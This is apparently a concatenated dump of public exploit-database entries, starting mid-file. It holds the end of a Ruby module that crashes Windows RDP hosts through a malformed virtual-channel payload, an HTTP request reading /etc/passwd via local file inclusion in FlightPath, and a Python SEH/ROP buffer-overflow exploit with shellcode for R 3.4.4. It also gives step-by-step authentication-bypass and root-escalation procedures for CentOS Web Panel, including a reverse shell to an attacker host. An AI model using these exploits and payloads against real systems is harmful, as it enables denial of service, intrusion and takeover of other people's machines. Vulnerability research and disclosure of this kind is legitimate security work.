    "\x3c\x00" + # cbClientDir (length value): 60
    "\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x4e\x00\x54\x00" + # clientDir - 'C:\WINNT\System32\mstscax.dll' + null terminator
    "\x5c\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00" +
    "\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00" +
    "\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00" +
    ## clientTimeZone - TS_TIME_ZONE struct - 172 bytes
    ## These are the default values for rdesktop
    "\xa4\x01\x00\x00" + # Bias
    ## StandardName - 'Mountain Standard Time' (UTF-16LE, zero padded)
    "\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" +
    "\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00" +
    "\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # StandardDate
    "\x00\x00\x00\x00" + # StandardBias
    ## DaylightName - 'Mountain Daylight Time' (UTF-16LE, zero padded)
    "\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" +
    "\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00" +
    "\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # DaylightDate
    "\xc4\xff\xff\xff" + # DaylightBias
    "\x01\x00\x00\x00" + # clientSessionId
    "\x06\x00\x00\x00" + # performanceFlags
    "\x00\x00" + # cbAutoReconnectCookie
    "\x64\x00\x00\x00"

  return(pdu)
end

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4e9722c3-ad83-43f5-af5a-529f73d88b48
# Confirm Active PDU Data - TS_CONFIRM_ACTIVE_PDU - 2.2.1.13.2.1
## Entirely static capability advertisement (23 capability sets) wrapped in a
## share control header of type 0x13.
def pdu_client_confirm_active()
  pdu = "\xea\x03\x01\x00" + # shareId: 66538
    "\xea\x03" + # originatorId
    "\x06\x00" + # lengthSourceDescriptor: 6
    "\x3e\x02" + # lengthCombinedCapabilities: ???
    "\x4d\x53\x54\x53\x43\x00" + # SourceDescriptor: 'MSTSC'
    "\x17\x00" + # numberCapabilities: 23
    "\x00\x00" + # pad2Octets
    "\x01\x00" + # capabilitySetType: 1 - TS_GENERAL_CAPABILITYSET
    "\x18\x00" + # lengthCapability: 24
    "\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00" +
    "\x00\x00\x00\x00" +
    "\x02\x00" + # capabilitySetType: 2 - TS_BITMAP_CAPABILITYSET
    "\x1c\x00" + # lengthCapability: 28
    "\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00" +
    "\x01\x00\x00\x1a\x01\x00\x00\x00" +
    "\x03\x00" + # capabilitySetType: 3 - TS_ORDER_CAPABILITYSET
    "\x58\x00" + # lengthCapability: 88
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00" +
    "\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01" +
    "\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00" +
    "\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00" +
    "\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00" +
    "\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x0a\x00" + # capabilitySetType: 10 - ??
    "\x08\x00" + # lengthCapability: 8
    "\x06\x00\x00\x00" +
    "\x07\x00" + # capabilitySetType: 7 - TS_WINDOWACTIVATION_CAPABILITYSET
    "\x0c\x00" + # lengthCapability: 12
    "\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x05\x00" + # capabilitySetType: 5 - TS_CONTROL_CAPABILITYSET
    "\x0c\x00" + # lengthCapability: 12
    "\x00\x00\x00\x00\x02\x00\x02\x00" +
    "\x08\x00" + # capabilitySetType: 8 - TS_POINTER_CAPABILITYSET
    "\x0a\x00" + # lengthCapability: 10
    "\x01\x00\x14\x00\x15\x00" +
    "\x09\x00" + # capabilitySetType: 9 - TS_SHARE_CAPABILITYSET
    "\x08\x00" + # lengthCapability: 8
    "\x00\x00\x00\x00" +
    "\x0d\x00" + # capabilitySetType: 13 - TS_INPUT_CAPABILITYSET
    "\x58\x00" + # lengthCapability: 88
    "\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00" +
    "\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x00\x00\x00" +
    "\x0c\x00" + # capabilitySetType: 12 - TS_SOUND_CAPABILITYSET
    "\x08\x00" + # lengthCapability: 8
    "\x01\x00\x00\x00" +
    "\x0e\x00" + # capabilitySetType: 14 - TS_FONT_CAPABILITYSET
    "\x08\x00" + # lengthCapability: 8
    "\x01\x00\x00\x00" +
    "\x10\x00" + # capabilitySetType: 16 - TS_GLYPHCACHE_CAPABILITYSET
    "\x34\x00" + # lengthCapability: 52
    "\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00" +
    "\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00" +
    "\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00" +
    "\x0f\x00" + # capabilitySetType: 15 - TS_BRUSH_CAPABILITYSET
    "\x08\x00" + # lengthCapability: 8
    "\x01\x00\x00\x00" +
    "\x11\x00" + # capabilitySetType: ??
    "\x0c\x00" + # lengthCapability: 12
    "\x01\x00\x00\x00\x00\x28\x64\x00" +
    "\x14\x00" + # capabilitySetType: ??
    "\x0c\x00" + # lengthCapability: 12
    "\x01\x00\x00\x00\x00\x00\x00\x00" +
    "\x15\x00" + # capabilitySetType: ??
    "\x0c\x00" + # lengthCapability: 12
    "\x02\x00\x00\x00\x00\x0a\x00\x01" +
    "\x1a\x00" + # capabilitySetType: ??
    "\x08\x00" + # lengthCapability: 8
    "\xaf\x94\x00\x00" +
    "\x1c\x00" + # capabilitySetType: ??
    "\x0c\x00" + # lengthCapability: 12
    "\x12\x00\x00\x00\x00\x00\x00\x00" +
    "\x1b\x00" + # capabilitySetType: ??
    "\x06\x00" + # lengthCapability: 6
    "\x01\x00" +
    "\x1e\x00" + # capabilitySetType: ??
    "\x08\x00" + # lengthCapability: 8
    "\x01\x00\x00\x00" +
    "\x18\x00" + # capabilitySetType: ??
    "\x0b\x00" + # lengthCapability: 11
    "\x02\x00\x00\x00\x03\x0c\x00" +
    "\x1d\x00" + # capabilitySetType: ??
    "\x5f\x00" + # lengthCapability: 95
    "\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2" +
    "\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80" +
    "\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00" +
    "\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb" +
    "\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02" +
    "\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04"

  ## type = 0x13 = TS_PROTOCOL_VERSION | PDUTYPE_CONFIRMACTIVEPDU
  return(rdp_build_share_control_header(0x13, pdu))
end

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5186005a-36f5-4f5d-8c06-968f28e2d992
## Client Synchronize - TS_SYNCHRONIZE_PDU - 2.2.1.19 / 2.2.14.1
def pdu_client_synchronize(target_user = 0)
  pdu = "\x01\x00" + # messageType: 1 SYNCMSGTYPE_SYNC
    [target_user].pack("S<") # targetUser, 16 bit, unsigned.

  ## pduType2 = 0x1f = 31 - PDUTYPE2_SYNCHRONIZE
  data_header = rdp_build_share_data_header(0x1f, pdu)

  ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
  return(rdp_build_share_control_header(0x17, data_header))
end

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9d1e1e21-d8b4-4bfd-9caf-4b72ee91a7135
## Control Cooperate - TC_CONTROL_PDU 2.2.1.15
def pdu_client_control_cooperate()
  pdu = "\x04\x00" + # action: 4 - CTRLACTION_COOPERATE
    "\x00\x00" + # grantId: 0
    "\x00\x00\x00\x00" # controlId: 0

  ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
  data_header = rdp_build_share_data_header(0x14, pdu)

  ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
  return(rdp_build_share_control_header(0x17, data_header))
end

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4f94e123-970b-4242-8cf6-39820d8e3d35
## Control Request - TC_CONTROL_PDU 2.2.1.16
def pdu_client_control_request()
  pdu = "\x01\x00" + # action: 1 - CTRLACTION_REQUEST_CONTROL
    "\x00\x00" + # grantId: 0
    "\x00\x00\x00\x00" # controlId: 0

  ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
  data_header = rdp_build_share_data_header(0x14, pdu)

  ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
  return(rdp_build_share_control_header(0x17, data_header))
end

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ff7f06f8-0dcf-4c8d-be1f-596ae60c4396
## Client Input Event Data - TS_INPUT_PDU_DATA - 2.2.8.1.1.3.1
## (method name keeps the historical "sychronize" spelling; callers use it)
def pdu_client_input_event_sychronize()
  pdu = "\x01\x00" + # numEvents: 1
    "\x00\x00" + # pad2Octets
    "\x00\x00\x00\x00" + # eventTime
    "\x00\x00" + # messageType: 0 - INPUT_EVENT_SYNC
    ## TS_SYNC_EVENT 2.2.8.1.1.3.1.1.5
    "\x00\x00" + # pad2Octets
    "\x00\x00\x00\x00" # toggleFlags

  ## pduType2 = 0x1c = 28 - PDUTYPE2_INPUT
  data_header = rdp_build_share_data_header(0x1c, pdu)

  ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
  return(rdp_build_share_control_header(0x17, data_header))
end

## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7067da0d-e318-4464-88e8-b11509cf0bd9
## Client Font List - TS_FONT_LIST_PDU - 2.2.1.18
def pdu_client_font_list()
  pdu = "\x00\x00" + # numberFonts: 0
    "\x00\x00" + # totalNumberFonts: 0
    "\x03\x00" + # listFlags: 3 (FONTLIST_FIRST | FONTLIST_LAST)
    "\x32\x00" # entrySize: 50

  ## pduType2 = 0x27 = 39 - PDUTYPE2_FONTLIST
  data_header = rdp_build_share_data_header(0x27, pdu)

  ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
  return(rdp_build_share_control_header(0x17, data_header))
end

# ------------------------------------------------------------------------- #

## Drains up to six pending server messages (read errors are ignored), then
## sends the virtual-channel payload to channel 0x03ef sixteen times.
## Style notes: `found`, `i` and `j` are never read; `6.times` / `16.times`
## would be the idiomatic loop form.
def crash_test(rc4enckey, hmackey)
  begin
    received = ""
    for i in 0..5
      received += rdp_recv()
    end
  rescue RdpCommunicationError
    # we don't care
  end

  vprint_status("Sending DoS payload")
  found = false
  for j in 0..15
    ## x86_payload:
    rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000020000000000000"].pack("H*")), rc4enckey, hmackey, "\x03\xef"))
    ## x64_payload:
    rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000000000000200000"].pack("H*")), rc4enckey, hmackey, "\x03\xef"))
  end
end

## Runs the RDP connection sequence end to end: negotiation, connect-initial,
## MCS domain/user/channel setup, security exchange, key derivation, client
## info, the capability/synchronize/control/input/font PDUs, then crash_test
## and a disconnect. Returns false only when the initial negotiation fails;
## everything else surfaces as an exception handled in run_host.
def produce_dos()
  unless(rdp_connection_initiation())
    vprint_status("Could not connect to RDP.")
    return(false)
  end

  vprint_status("Sending initial client data")
  received = rdp_sendrecv(pdu_connect_initial(RDPConstants::PROTOCOL_RDP, datastore['RDP_CLIENT_NAME']))
  rsmod, rsexp, rsran, server_rand, bitlen = rdp_parse_connect_response(received)

  vprint_status("Sending erect domain request")
  rdp_send(pdu_erect_domain_request())

  vprint_status("Sending attach user request")
  received = rdp_sendrecv(pdu_attach_user_request())
  ## Initiator userId sits at offset 9 of the AttachUserConfirm (big-endian).
  user1 = received[9, 2].unpack("n").first

  [1003, 1004, 1005, 1006, 1007].each do | chan |
    rdp_sendrecv(pdu_channel_request(user1, chan))
  end

  ## 5.3.4 Client Random Value
  ## NOTE(review): `'' << Integer` appends a codepoint, not a byte. Unless this
  ## file's source encoding is binary, values >= 128 become two-byte UTF-8
  ## sequences and client_rand is longer than 32 bytes - confirm the file's
  ## encoding or build it with [rand(0..255)].pack("C").
  client_rand = ''
  32.times { client_rand << rand(0..255) }
  rcran = bytes_to_bignum(client_rand)

  vprint_status("Sending security exchange PDU")
  rdp_send(pdu_security_exchange(rcran, rsexp, rsmod, bitlen))

  ## We aren't decrypting anything at this point. Leave the variables here
  ## to make it easier to understand in the future.
  rc4encstart, rc4decstart, hmackey, sessblob = rdp_calculate_rc4_keys(client_rand, server_rand)

  vprint_status("RC4_ENC_KEY: #{bin_to_hex(rc4encstart)}")
  vprint_status("RC4_DEC_KEY: #{bin_to_hex(rc4decstart)}")
  vprint_status("HMAC_KEY: #{bin_to_hex(hmackey)}")
  vprint_status("SESS_BLOB: #{bin_to_hex(sessblob)}")

  rc4enckey = RC4.new(rc4encstart)

  vprint_status("Sending client info PDU")
  # TODO
  pdu = pdu_client_info(datastore['RDP_USER'], datastore['RDP_DOMAIN'], datastore['RDP_CLIENT_IP'])
  ## Channel 1003 with the SEC_INFO_PKT flag set (fifth argument).
  received = rdp_sendrecv(rdp_build_pkt(pdu, rc4enckey, hmackey, "\x03\xeb", true))

  vprint_status("Received License packet")
  rdp_recv()

  vprint_status("Sending client confirm active PDU")
  rdp_send(rdp_build_pkt(pdu_client_confirm_active(), rc4enckey, hmackey))

  vprint_status("Sending client synchronize PDU")
  rdp_send(rdp_build_pkt(pdu_client_synchronize(1009), rc4enckey, hmackey))

  vprint_status("Sending client control cooperate PDU")
  rdp_send(rdp_build_pkt(pdu_client_control_cooperate(), rc4enckey, hmackey))

  vprint_status("Sending client control request control PDU")
  rdp_send(rdp_build_pkt(pdu_client_control_request(), rc4enckey, hmackey))

  vprint_status("Sending client input sychronize PDU")
  rdp_send(rdp_build_pkt(pdu_client_input_event_sychronize(), rc4enckey, hmackey))

  vprint_status("Sending client font list PDU")
  rdp_send(rdp_build_pkt(pdu_client_font_list(), rc4enckey, hmackey))

  vprint_status("Sending close mst120 PDU")
  crash_test(rc4enckey, hmackey)

  vprint_status("Sending client disconnection PDU")
  rdp_send(rdp_build_data_tpdu("\x21\x80"))

  return(true)
end

# ------------------------------------------------------------------------- #

## Per-host entry point: opens the connection, runs produce_dos, then
## re-connects once after a one-second pause to judge the outcome.
## NOTE(review): `status` is only ever compared with `true`, so the CheckCode
## assigned in the RdpCommunicationError branch never changes what the ensure
## block prints; a connection-level rescue leaves `status` nil and prints nothing.
def run_host(ip)
  ## Allow the run command to call the check command.
  begin
    if(open_connection())
      status = produce_dos()
    end
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e
    bt = e.backtrace.join("\n")
    vprint_error("Unexpected error: #{e.message}")
    vprint_line(bt)
    elog("#{e.message}\n#{bt}")
  rescue RdpCommunicationError => e
    vprint_error("Error communicating RDP protocol.")
    status = Exploit::CheckCode::Unknown
  rescue Errno::ECONNRESET => e # NLA?
    vprint_error("Connection reset, possible NLA is enabled.")
  rescue => e
    bt = e.backtrace.join("\n")
    vprint_error("Unexpected error: #{e.message}")
    vprint_line(bt)
    elog("#{e.message}\n#{bt}")
  ensure
    if(status == true)
      sleep(1)
      ## A second connect that fails is taken as the service having gone down.
      unless(open_connection())
        print_good("The host is crashed!")
      else
        print_bad("The DoS has been sent but the host is already connected!")
      end
    end
    disconnect()
  end
end
end
FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion
# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion # Date: 07-07-2019 # Exploit Author: Mohammed Althibyani # Vendor Homepage: http://getflightpath.com # Software Link: http://getflightpath.com/project/9/releases # Version: < 4.8.2 & < 5.0-rc2 # Tested on: Kali Linux # CVE : CVE-2019-13396 # Parameters : include_form # POST Method: use the login form to obtain a valid form_token [ a wrong user/pass is fine ] This is what the POST looks like: POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D&current_student_id=&user=test&password=test&btn_submit=Login # modify the POST request to be: POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd # Greetings to : Ryan Saaty, Mohammed Al-Howsa & Haboob Team.
R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)
#!/usr/bin/python
# Exploit Title: R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH(DEP/ASLR Bypass)
# Date: 2019-07-15
# Exploit Author: blackleitus
# Vendor Homepage: https://www.r-project.org/
# Tested on: Windows 10 Home Single Language 64-bit
# Social: https://twitter.com/blackleitus
# Website: https://skybulk.github.io/
# discovered by: bzyo
# GUI Preferences -> paste payload.txt into 'Language for menus ...' -> click OK
#
# Writes a single file (payload.txt) made of: junk, SEH record, nop-equivalent
# gadgets, ROP chain, shellcode, padding - in that order (see `payload` below).
# NOTE(review): this is Python 2 source (print statement, str used as a byte
# buffer); it does not run unmodified under Python 3.
import struct

outfile = 'payload.txt'


def create_rop_chain():
    # Hard-coded gadget addresses; each is emitted as a 32-bit little-endian
    # value, so the chain is 4 * len(rop_gadgets) bytes long.
    rop_gadgets = [
      0x6c998f58,  # POP EAX # RETN [R.dll]
      0x6379973c,  # ptr to &VirtualProtect() [IAT methods.dll]
      0x6fee2984,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll]
      0x6ca1ba76,  # XCHG EAX,ESI # RETN [R.dll]
      0x64c45cb8,  # POP ECX # RETN ** [methods.dll] ** | {PAGE_EXECUTE_READ}
      0x64c46010,  # &Writable location [methods.dll]
      0x6cacc7e2,  # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x7139c7ba,  # NEG EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
      0x6ca3485a,  # XCHG EAX,EDX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
      0x7135a862,  # POP EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x6e7d41ca,  # NEG EAX # RETN ** [utils.dll] ** | {PAGE_EXECUTE_READ}
      0x63742597,  # XCHG EAX,EBX # RETN ** [Rgraphapp.dll] ** | {PAGE_EXECUTE_READ}
      0x6cbef3c0,  # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
      0x41414141,  # Filler (compensate)
      0x6c9b1de7,  # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
      0x6ca2a9bd,  # & jmp esp [R.dll]
      0x6cbebfa6,  # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
      0x90909090,  # nop
      0x6ca00e93,  # POP EDI # RETN [R.dll]
      0x6375fe5c,  # RETN (ROP NOP) [Rgraphapp.dll]
      0x6ff1b7bb,  # PUSHAD # RETN [grDevices.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)


rop_chain = create_rop_chain()

junk = "A" * 1016
seh = struct.pack("<L", 0x6cb5f812)  # 0x6cb5f812 : {pivot 2988 / 0xbac} : # ADD ESP,0B9C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x09\x0a\x0d' cmd=calc.exe exitfunc=thread -f python
# 30 four-byte entries, i.e. 120 bytes on the wire.
nops = struct.pack("<L", 0x6cacc7e3) * 30

shellcode = ""
shellcode += "\x90" * 20
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

# Pads the file towards a fixed total size; the subtracted terms mirror the
# components concatenated into `payload` below.
padding = "D" * (8000-1016-4-30-len(rop_chain)-len(shellcode))

payload = junk + seh + nops + rop_chain + shellcode + padding

with open(outfile, 'w') as file:
    file.write(payload)

print "payload File Created\n"
CentOS Control Web Panel 0.9.8.836 - Authentication Bypass
# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.847 Bypass Login # Date: 6 July 2019 # Exploit Author: Pongtorn Angsuchotmetee # Vendor Homepage: https://control-webpanel.com/changelog # Software Link: Not available, user panel only available for latest version # Version: 0.9.8.836 to 0.9.8.846 # Tested on: CentOS 7.6.1810 (Core) # CVE : CVE-2019-13360, CVE-2019-13605 # ==================================================================== # Information # ==================================================================== Product : CWP Control Web Panel Vulnerability Name : User panel bypass Login version : 0.9.8.836 Fixed on : 0.9.8.848 Test on : CentOS 7.6.1810 (Core) Reference : http://centos-webpanel.com/ : https://control-webpanel.com/changelog CVE-Number : CVE-2019-13605 # ==================================================================== # Root cause of the vulnerability # ==================================================================== After a successful login, the application returns a base64 value and uses it to authenticate again. That allows an attacker to modify the response and become a user. # ==================================================================== # Response format (version 0.9.8.836 to 0.9.8.837) # ==================================================================== <username>||/<username>/theme/original # CVE-2019-13360 # ==================================================================== # Steps to Reproduce Version 0.9.8.836 to 0.9.8.837 # ==================================================================== 1. Login with valid username and invalid password 2. Replace the target username in "<username>||/<username>/theme/original" 3. Convert to base64 4. Place the base64 value in the HTTP response body 5.
Gain access to user area # CVE-2019-13605 # ==================================================================== # Steps to Reproduce Version 0.9.8.838 to 0.9.8.846 # ==================================================================== 1. Create a testing environment 1.1 Create a user with the target username 1.2 Login as the user 1.3 Save the HTTP response body (token value) 2. Login to the real target with valid username and invalid password 3. Place the value saved in step 1.3 in the HTTP response body 4. Gain access to user area *The response value format depends on the version; just replace the whole value # ==================================================================== # PoC # ==================================================================== https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13360.md https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13605.md # ==================================================================== # Timeline # ==================================================================== 2019-07-07: Discovered the bug 2019-07-07: Reported to vendor 2019-07-07: Vendor accepted the vulnerability 2019-07-11: The vulnerability has been fixed 2019-07-15: Advisory published # ==================================================================== # Discovered by # ==================================================================== Pongtorn Angsuchotmetee
CentOS Control Web Panel 0.9.8.836 - Privilege Escalation
//====================================================================\\ || || || CWP Control Web Panel 0.9.8.836 - 0.9.8.839 || || Root Privilege Escalation || || || \\====================================================================// # ==================================================================== # Information # ==================================================================== # Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.40 Root Privilege Escalation # Date: 6 July 2019 # Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak # Vendor Homepage: https://control-webpanel.com/changelog # Software Link: http://centos-webpanel.com/cwp-el7-latest (Have to change version in the script) # Version: 0.9.8.836 to 0.9.8.839 # Tested on: CentOS 7.6.1810 (Core) # CVE : CVE-2019-13359 Product : CWP Control Web Panel Vulnerability Name : Root Privilege Escalation version : 0.9.8.836 Fixed on : 0.9.8.840 Test on : Tested on: CentOS 7.6.1810 (Core) Reference : http://centos-webpanel.com/ : https://control-webpanel.com/changelog CVE-Number : CVE-2019-13359 # ==================================================================== # Root course of the vulnerability # ==================================================================== 1. The session file are store at /tmp directory 2. rkey value in the session file dose not change when access by the same source IP address # ==================================================================== # Steps to Reproduce # ==================================================================== Session prepareation state 1. Check the current IP address of attacker 2. Set the IP address on testing environment network 3. Login as root on port 2031/2087 and save the cookie name from web browser (cwsrp-xxxxxxxxxxxxxxxxxxxxx) 4. Copy the content of session file (/tmp/sess_xxxxxxxxxxxxxx) to a new file "sess_123456" # we need "rkey" 5. 
Save the token value from the session file (cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx) * rkey is created from client ip, then do not change client ip when attack the real target Attack state # # Method 1 Uploading via reverse shell # 1. Go to crontab and set "bash -i >& /dev/tcp/[Attacker-IP]/8000 0>&1" 2. Create session file through reverse shell echo "username|s:4:\"root\";logged|b:1;rkey|s:20:\"[RKEY]\";token|s:36:\"[TOKEN-KEY]\";" > /tmp/sess_123456 3. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php 4. Change file permission "chmod 664 /tmp/sess_123456" 5. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456) 6. Open the URL and become the root user # # Method 2 Uploading via File manager function # 1. On the real target, login as a normal user on port 2083 and upload file "sess_123456" to /tmp directory and set permission to 644 (chmod 664 /tmp/sess_123456) via crontab feature 2. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php 3. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456) 4. Open the URL and become the root user *From step 1 - 4 need doing it quickly. if we do it too slow, the application will change the permission of file sess_123456 to 600, and the file will become 0 byte. 
If this happened, attacker need to change session file name and repeat the steps again # ==================================================================== # PoC # ==================================================================== https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13359.md # ==================================================================== # Timeline # ==================================================================== 2019-06-30: Discovered the bug 2019-06-30: Reported to vendor 2019-06-30: Vender accepted the vulnerability 2019-07-02: The vulnerability has been fixed 2019-07-06: Published # ==================================================================== # Discovered by # ==================================================================== Pongtorn Angsuchotmetee Nissana Sirijirakal Narin Boonwasanarak
-
DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)
